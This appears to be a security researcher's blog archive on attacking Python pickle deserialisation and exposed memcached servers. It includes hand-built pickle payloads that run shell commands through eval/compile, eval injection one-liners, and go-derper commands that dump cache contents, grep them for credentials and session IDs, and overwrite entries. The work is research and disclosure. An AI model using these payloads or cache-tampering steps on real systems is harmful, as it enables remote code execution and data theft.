Grey bar Blue bar
Share this:

Thu, 24 Feb 2011

Playing with Python Pickle #3

[This is the third in a series of posts on Pickle. Link to part one and two.]

Thanks for stopping by. This is the third posting on the bowels of Python Pickle, and it's going to get a little more complicated before it gets easier. In the previous two entries I introduced Pickle as an attack vector present in many memcached instances, and documented tricks for executing OS commands across Python versions as well as a mechanism for generically calling class instance methods from within the Pickle VM.

In this post we'll look at executing pure Python code from within a Pickle steram. While running os.system() or one of its cousins is almost always a necessity, having access to a Python interpreter means that your exploits can be that much more efficient (skip on the Shell syntax, slightly more portable exploits). I imagine one would tend to combine the pure Python with os.system() calls.

Normal execution of pure Python

Dynamic Python execution is normally acheived through the 'exec' statement. However, since 'exec' is a Python statement and not a class method, the depickler knows nothing about 'exec'. __builtin__.eval() on the other hand is a method that the depickler can call; however eval() normally takes an expression only. Thus,

eval("import os; os.system('ls'))

fails. It's worth noting that one can still call methods in expressions, so

eval("os.system('ls')")

can work if the 'os' module is present in the environment. If it isn't, you can still import 'os' with the expression:

eval("__import__('os').system('ls')")

or even execute a full code block with a double eval():

eval('eval(compile("import os;os.system(\\"ls\\")","q","exec"))')

Moral of that story: don't ever eval() untrusted input. Obviously.

However, we want to execute not only expressions but full Python scripts. eval() will also accept a code object, which is produced by compile(), and compile() will accept a full Python script. For example, to prove execution here's the venerable timed wait:

cmd = "import os; f=os.popen('sleep 10'); f.read()" c = compile(cmd,"foo","exec") eval(c)

Reaching into eval'ed code

Continuing with eval(), we try a similar example except we execute 'ls' instead of sleep (and do it in one line of Python). There's an important distinction here, and that is the return value of eval; notice how 'ls' returns nothing:

>>> ret=eval(compile("import os; f=os.popen('ls'); f.read()","foo","exec")) >>> print ret None

This is because eval() always returns "None" if the supplied code object was compiled with "exec" and means we need a different trick for extracting contents of the eval'ed script. Luckily our first idea worked (yay), so we didn't look further; there may be better/faster/easier options. That idea was to modify the script's globals (variables scoped for the entire script) inside the eval() call, and access globals outside the eval() calls. This works, as globals are passed into eval() and changes reflects after the call returns:

>>> print smashed Traceback (most recent call last): File "", line 1, in NameError: name 'smashed' is not defined >>> eval(compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec")) >>> print smashed Desktop Documents Downloads Library Movies Music ...

Converting to Pickle

In the example above, the global "smashed" is created inside eval(), and carried into the outer environment. It is quite easy to convert the eval(compile()) pattern into a Pickle:

c__builtin__ eval (c__builtin__ compile (S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n' S"" S"exec" tRc__builtin__ globals )RtRc__builtin__ globals )R.

This executes 'ls -al', stores it in the "smashed" global variables and returns the whole globals dict as the end result of depickling. However, it is messy; globals contains other entries which is a waste of space and makes output harder to read. If we're inserting this into a broader pickle, we'd like to have more control (i.e. return a single string) rather than hope that whatever object we are injecting into can handle a dict.

Final exercise

Pickle does not appear to have a way of referencing dict entries (i.e. globals()['smashed'] in Python), so again we have to dig into the docs. The dict builtin supports a "get" method, but requires a class instance... which should sound a little familiar if you still recall the trick from the last post on reading output from os.popen. In Python terms what we're doing is:

code=compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec") eval(code) __builtin__.apply(__builtin__.getattr(__builtin__.dict,"get"),(__builtin__.globals(),"smashed"))

Converted into Pickle we get:

c__builtin__ eval (c__builtin__ compile (S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n' S"" S"exec" tRc__builtin__ globals )RtR0(c__builtin__ globals )RS"smashed" tp0 0c__builtin__ getattr (c__builtin__ dict S"get" tRp1 0c__builtin__ apply (g1 g0 tR.

The execution trace of this Pickle stream is:

  1. 'c' -> find the callable "__builtin__.eval", push it onto the stack [SB] [__builtin__.eval]
  2. '(' -> push a MARK onto the stack [SB] [__builtin__.eval] [MARK]
  3. 'c' -> find the callable "__builtin__.compile", push it onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile]
  4. '(' -> push a MARK onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK]
  5. "S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'" -> push 'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n']
  6. "S''" -> push '' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'] ['']
  7. "S'exec'" -> push 'exec' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'] [''] ['exec']
  8. 't' -> pop 'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec' and MARK, push ('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec') [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec')]
  9. 'R' -> pop "__builtin__.compile" and "('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec')", call __builtin__.compile('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec'), push the code object onto the stack [SB] [__builtin__.eval] [MARK] [code_object]
  10. 'c' -> find the callable "__builtin__.globals", push it onto the stack [SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals]
  11. ')' -> push an empty tuple onto the stack [SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals] [()]
  12. 'R' -> pop "__builtin__.globals" and "()", call __builtin__.globals(), push the dict onto the stack [SB] [__builtin__.eval] [MARK] [code_object] []
  13. 't' -> pop code_object, and MARK, push (code_object, ) [SB] [__builtin__.eval] [(pop code_object, )]
  14. 'R' -> pop "__builtin__.eval" and "(pop code_object, )", call __builtin__.eval(pop code_object, ), push the None onto the stack [SB] [None]
  15. '0' -> pop None from the stack [SB]
  16. '(' -> push a MARK onto the stack [SB] [MARK]
  17. 'c' -> find the callable "__builtin__.globals", push it onto the stack [SB] [MARK] [__builtin__.globals]
  18. ')' -> push an empty tuple onto the stack [SB] [MARK] [__builtin__.globals] [()]
  19. 'R' -> pop "__builtin__.globals" and "()", call __builtin__.globals(), push the dict onto the stack [SB] [MARK] [<globals dict>]
  20. "S'smashed'" -> push 'smashed' onto the stack [SB] [MARK] [<globals dict>] ['smashed']
  21. 't' -> pop <globals dict>, 'smashed' and MARK, push (, 'smashed') [SB] [(<globals dict>,'smashed')]
  22. 'p0' -> store (<globals dict>, 'smashed') in register 0 [SB] [(<globals dict>,'smashed')]
  23. '0' -> pop (<globals dict>, 'smashed') from the stack [SB]
  24. 'c' -> find the callable "__builtin__.getattr", push it onto the stack [SB] [__builtin__.getattr]
  25. '(' -> push a MARK onto the stack [SB] [__builtin__.getattr] [MARK]
  26. 'c' -> find the callable "__builtin__.dict", push it onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.dict]
  27. "S'get'" -> push 'get' onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.dict] ['get']
  28. 't' -> pop __builtin__.dict,'get' and MARK, push (__builtin__.dict,'get') [SB] [__builtin__.getattr] (__builtin__.dict,'get')
  29. 'R' -> pop "__builtin__.getattr" and "(__builtin__.dict,'get')", call __builtin__.getattr(__builtin__.dict,'get'), push the attribute onto the stack [SB] [dict.get]
  30. 'p1' -> store dict.get in register 1 [SB] [dict.get]
  31. '0' -> pop dict.get from the stack [SB]
  32. 'c' -> find the callable "__builtin__.apply", push it onto the stack [SB] [__builtin__.apply]
  33. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK]
  34. 'p1' -> push dict.get from register 1 [SB] [__builtin__.apply] [MARK] [dict.get]
  35. 'p1' -> push (<globals dict>, 'smashed') from register 0 [SB] [__builtin__.apply] [MARK] [dict.get] [(<globals dict>, 'smashed')]
  36. 't' -> pop dict.get,(<globals dict>, 'smashed') and MARK, push [dict.get,(<globals dict>, 'smashed')] [SB] [__builtin__.apply] [(dict.get,(<globals dict>, 'smashed'))]
  37. 'R' -> pop "__builtin__.apply" and "(dict.get,(<globals dict>, 'smashed'))", call __builtin__.apply(dict.get,(<globals dict>, 'smashed')), push the "smashed" value onto the stack [SB] ["Desktop\nDocuments\nDownloads\n..."]
  38. '.' -> pop and return value of "smashed", exit [SB]

Ending off

This post demonstrates a few concepts that are of interest to the Pickle hacker. We showed how to construct a Pickle stream such that arbitrary Python was executed during the deserialization process, we mentioned that it was possible to carry information from within an eval() call into the executing environment of the depickler, and finally we revisited the trick for indirectly calling class instance methods in order to return eval()'s value as the depickled object.

In the last posting on this topic, we'll look at tactical uses for all the Pickle hacking we've covered: where to find Pickle objects, where they're processed and how to modify objects in place. Stay tuned.

Tue, 9 Nov 2010

Playing with Python Pickle #1

In our recent memcached investigations (a blog post is still in the wings) we came across numerous caches storing serialized data. The caches were not homogenous and so the data was quite varied: Java objects, ActiveRecord objects from RoR, JSON, pre-rendered HTML, .Net serialized objects and serialized Python objects. Serialized objects can be useful to an attacker from a number of standpoints: such objects could expose data where naive developers make use of the objects to hold secrets and rely on the user to proxy the objects to various parts of an application. In addition, altering serialized objects could impact on the deserialization process, leading to compromise of the system on which the deserialization takes place.

In all the caches we examined, the most common data format found (apart from HTML snippets) was serialized Python and this prompted a brief investigation into the possible attacks against serialized Python objects. We've put together a couple of posts explaining how one might go about exploiting Pickle strings; the obvious vector is memcached however anytime Pickle strings are passed to an untrusted party the attacks described here become useful.

Background

Python implements a default serialization technique called Pickle. Now I don't pretend to be a Pickle expert; Python is not my script language of choice for starters and serialization is not particularly interesting subject to me, however seeing the following in any docs is cause for further digging:

A little further down the same page, we find a trivial example of how to execute code from a Pickle stream and a quick Google leads to a blog post in which Pickle insecurities are fleshed out in more detail. Both are worthwhile reads.

From these sources emerge the following factoids:

  • Pickle streams (or strings) are not simply data formats, they can reconstruct arbitrary Python objects.
  • Objects are described as a sequence of instructions and data stored in a stream of mostly 7-bit chars (newer version of the Pickle protocol support 8-bit opcodes too).
  • The stream is deserialized by a simple virtual machine. Features of the machine are that it is stack-based, includes memo storage (these are registers accessible in any scope), and can call Python callables. There are no branching or looping instructions.
  • Once the virtual machine has processed a complete set of instructions, the final deserialized object returned to the caller is whatever single object remains on the stack. Errors are produced if the final stack is empty or contains more than one item, or if the instruction sequence is malformed or terminates before the end of the serialized data.
  • Since Python 2.3, any semblance of protection in the Pickle code has been removed. Python developers have explicitly stated that the effort required to implement proper security in Pickle exceeds the usefulness of such an exercise and to underline this point they have removed all security controls that were present.

This last point was particularly intriguing; developers purposely removed any semblance of security from the depickling mechanism and exhort users to never deserialize untrusted data. However, the memcached work showed that if one could find memcached instances, it was possible to overwrite data within the cache trivially. If data inside a cache was comprised of Pickle strings, then by overwriting them an attacker is able to inject untrusted Pickle objects into a deserialization operation.

We've had a bit of fun with this seeing how far it can be pushed and over the coming days, I'll post three more entries on this topic. In the mean time, here's some background and a few simple examples to get things going.

Following along

In order to understand the Pickle objects below, you'll need to follow a few basic opcodes and their arguments:

  • c<module>\n<function>\n -> push <module>.<function> onto the stack. There are subtleties here, but for the most part it works.
  • ( -> push a MARK object onto the stack.
  • S'<string>'\n -> Push <string> object onto the stack.
  • V'<string>'\n -> Push Unicode <string> object onto the stack.
  • l -> pop everything off the stack up to the topmost MARK object, create a list with the objects (excl MARK) and push the list back onto the stack
  • t -> pop everything off the stack up to the topmost MARK object, create a tuple with the object (excl MARK) and push the tuple back onto the stack
  • R -> pop two objects off the stack; the top object is treated is an argument and the lower object is a callable (function object). Apply the function to the arguments and push the result back onto the stack
  • p<index>\n -> Peek at the top stack object and store it in memo <index>.
  • g<index>\n -> Grab an object from memo <index> and push onto the stack.
  • 0 -> Pop and discard the topmost stack item.
  • . -> Terminate the virtual machine
With these simple instructions it's possible to execute arbitrary Python code, call OS commands and delve into the currently running Python process, as we'll show in the next couple of posts. I should also mention that the virtual machine supports a bunch of other instructions and these are well documented in pickletools.py, however for the sake of keeping things simple I've only mentioned instructions that we'll actually touch.

Getting started

Testing out Pickle objects is pretty simple:

import pickle str="""S'Hello world' .""" pickle.loads(str)

(All the Pickle strings we'll play with can be substituted in for "str". Note that Pickle is sensitive to spacing and newlines, so don't introduce extras.)
The pickled data "S'Hello World'" simply instructs the VM to push a "Hello World" string object onto the stack. The final "." pops the stack and returns whatever is present.

An important instruction is the MARK opcode "(", which is used to signify frames on the stack. It is normally used in conjunction with opcodes that have to pop multiple objects off the stack, for example opcodes that build lists, tuples or dicts. The two examples below show how a list and a tuple are produced:

(S'Hello' S'World' l.

produces

['Hello','World']

and

(S'Hello' S'World' t.

produces

('Hello','World')

Final example

The canonical example given in a number of places including the official Python docs as to why unpickling untrusted data is bad is:

cos system (S'echo hello world' tR. The intent is clear however the interesting bit is twofold: decoding the instructions used and realizing that for an attacker, "hello world" isn't all that useful. In the next post I'll introduce the basics behind calling functions and see whether we can extend the canonical example into something a little more evil.

Sat, 7 Aug 2010

BlackHat Write-up: go-derper and mining memcaches

[Update: Disclosure and other points discussed in a little more detail here.]

Why memcached?

At BlackHat USA last year we spoke about attacking cloud systems, while the thinking was broadly applicable, we focused on specific providers (overview). This year, we continued in the same vein except we focused on a particular piece of software used in numerous large-scale application including many cloud services. In the realm of "software that enables cloud services", there appears to be a handful of "go to" applications that are consistently re-used, and it's curious that a security practitioner's perspective has not as yet been applied to them (disclaimer: I'm not aware of parallel work).

We choose to look at memcached, a "Free & open source, high-performance, distributed memory object caching system" 1. It's not outwardly sexy from a security standpoint and it doesn't have a large and exposed codebase (total LOC is a smidge over 11k). However, what's of interest is the type of applications in which memcached is deployed. Memcached is most often used in web application to speed up page loads. Sites are almost2 always dynamic and either have many clients (i.e. require horizontal scaling) or process piles of data (look to reduce processing time), or oftentimes both. This implies that the sites that use memcached contain more interesting info than simple static sites, and are an indicator of a potentially interesting site. Prominent users of memcached include LiveJournal (memcached was originally written by Brad Fitzpatrick for LJ), Wikipedia, Flickr, YouTube and Twitter.

I won't go into how memcached works, suffice it to say that since data tends to be read more often than written in common use cases the idea is to pre-render and store the finalised content inside the in-memory cache. When future requests ask for the page or data, it doesn't need to be regenerated but can be simply regurgitated from the cache. Their Wiki contains more background.

go-derper

We released go-derper, a tool for playing with memcached instances. It supports three basic modes of operations:
  1. Fingerprinting memcacheds to determine interesting servers
  2. Extracting a (user-limited) copy of the cache
  3. Writing data into the cache
The tool has minor requirements: a recent Ruby and the memcache-client gem. What follows are basic use cases.

Fingerprinting

Let's assume you've scanned a hosting provider and found 239 potential targets using a basic .nse that hunts down open memcached instances3. You need to separate the wheat from the chaff and figure out which servers are potentially interesting; one way to do that is by extracting a bunch of metrics from each cache. Start small against one cache: insurrection:demo marco$ ruby go-derper.rb -f x.x.x.x [i] Scanning x.x.x.x x.x.x.x:11211 ============================== memcached 1.4.5 (1064) up 54:10:01:27, sys time Wed Aug 04 10:34:36 +0200 2010, utime=369388.17, stime=520925.98 Mem: Max 1024.00 MB, max item size = 1024.00 KB Network: curr conn 18, bytes read 44.69 TB, bytes written 695.93 GB Cache: get 514, set 93.41b, bytes stored 825.73 MB, curr item count 1.54m, total items 1.54m, total slabs 3 Stats capabilities: (stat) slabs settings items (set) (get)

44 terabytes read from the cache in 54 days with 1.5 million items stored? This cache is used quite frequently. There's an anomaly here in that the cache reports only 514 reads with 93 billion writes; however it's still worth exploring if only for the size.

We can run the same fingerprint scan against multiple hosts using

ruby go-derper.rb -f host1,host2,host3,...,hostn

or, if the hosts are in a file (one per line):

ruby go-derper.rb -F file_with_target_hosts

Output is either human-readable multiline (the default), or CSV. The latter helps for quickly rearranging and sorting the output to determine potential targets, and is enabled with the "-c" switch:

ruby go-derper.rb -c csv -f host1,host2,host3,...,hostn

Lastly, the monitor mode (-m) will loop forever while retrieving certain statistics and keep track of differences between iterations, in order to determine whether the cache appears to be in active use.

Mining

Once you've identified a potentially interesting target, it's time to mine that cache. The basic leach switch is "-l":

insurrection:demo marco$ ruby go-derper.rb -l -s x.x.x.x [w] No output directory specified, defaulting to ./output [w] No prefix supplied, using "run1"

This will extract data from the cache in the form of a key and its value, and save the value in a file under the "./output" directory by default (if this directory doesn't exist then the tool will exit so make sure it's present.) This means a separate file is created for every retrieved value. Output directories and file prefixes are adjustable with "-o" and "-r" respectively, however it's usually safe to leave these alone.

By default, go-derper fetches 10 keys per slab (see the memcached docs for a discussion on slabs; basically similar-sized entries are grouped together.) This default is intentionally low; on an actual assessment this could run into six figures. Use the "-K" switch to adjust:

ruby go-derper.rb -l -K 100 -s x.x.x.x

As mentioned, retrieved data is stored in the "./ouput" directory (or elsewhere if "-o" is used). Within this directory, each new run of the tool produces a set of files prefixed with "runN" in order to keep multiple runs separate. The files produced are:

  • runN-index, an index file containing metadata about each entry retrieved
  • runN-<md5>, a file containing the bytestream from a retrieved value
The mapping between key and file in which the value is stored occurs in the index file, which is useful in that potentially malicious data (keynames) aren't used when interacting with your local filesystem APIs.

At this point, there will (hopefully) be a large number of files in your output directory, which may contain useful info. Start grepping.

What we found with a bit of field experience was that mining large caches can take some time, and repeating grep gets quite boring. The tool permits you to supply your own set of regular expressions which will be applied to each retrieved value; matches are printed to the screen and this provides a scroll-by view of bits of data that may pique your interest (things like URLs, email addresses, session IDs, strings starting with "user", "pass" or "auth", cookies, IP addresses etc). The "-R" switch enables this feature and takes a file containing regexes as its sole argument:

ruby go-derper.rb -l -K 100 -R regexs.txt -s x.x.x.x

Over-writing

In this blog entry I don't cover the kinds of data we discovered (it'll be subject to a separate entry), however it may come to pass that you discover an interesting cache entry that you'd like to overwrite. Recall entries were stored in "./output" by default, with a prefix of "runN". If the interesting entry was stored in "output/run1-e94aae85bd3469d929727bee5009dddd", edit the file in whatever manner you see fit and save it to your local disk. Then, tell go-derper to write the entry back into the cache with:

ruby go-derper.rb -w output/run1-e94aae85bd3469d929727bee5009dddd

This syntax is simple since go-derper will figure out the target server and key from the run's index file.

And so?

Go-derper permits basic manipulations of a memcached instance. We haven't covered finding open instances or the kinds of data one may come across; these will be the subject of followup posts. Below are the slides from the talk, click through to SlideShare for the downloadable PDF.
1 http://www.memcached.org

2 We're hedging here, but we've not come across a static memcached site.

3 If so, you may be as surprised as we were in finding this many open instances.

Memcached talk update

Wow. At some point our talk hit HackerNews and then SlashDot after swirling around the Twitters for a few days. The attention is quite astounding given the relative lack of technical sexiness to this; explanations for the interest are welcome!

We wanted to highlight a few points that didn't make the slides but were mentioned in the talk:

  • Bit.ly and GoWalla repaired the flaws extremely quickly, prior to the talk.
  • PBS didn't get back to us.
  • GlobWorld is in beta and isn't publicly available yet.
For those blaming admins or developers, I think the criticism is overly harsh (certainly I'm not much of a dev as the "go-derper" source will show). The issues we found were in cloud-based systems and an important differentiating factor between deploying apps on local systems as opposed to in the cloud is that developers become responsible for security issues that were never within their job descriptions; network-level security is oftentimes a foreign language to developers who are more familiar with app-level controls. With cloud deployments (such as those found in small startups without dedicated network-security people) the devs have to figure all this out.

The potential risk assigned to exposed memcacheds hasn't as yet been publicly demonstrated so it's unsurprising that you'll find memcacheds around. I imagine this issue will flare and be hunted into extinction, at least on the public interwebs.

Lastly, the major interest seems to be on mining data from exposed caches. An equally disturbing issue is overwriting entries in the cache and this shouldn't be underestimated.

Fri, 30 Jul 2010

Go-derper: mining your memcacheds

Today at BlackHat USA 2010 we released a tool for manipulating memcached instances; we still need to write it up properly but here's a link to the tool for the moment.

tl;dr: if you find a memcached, you can dump the cache and manipulate entries in the cache.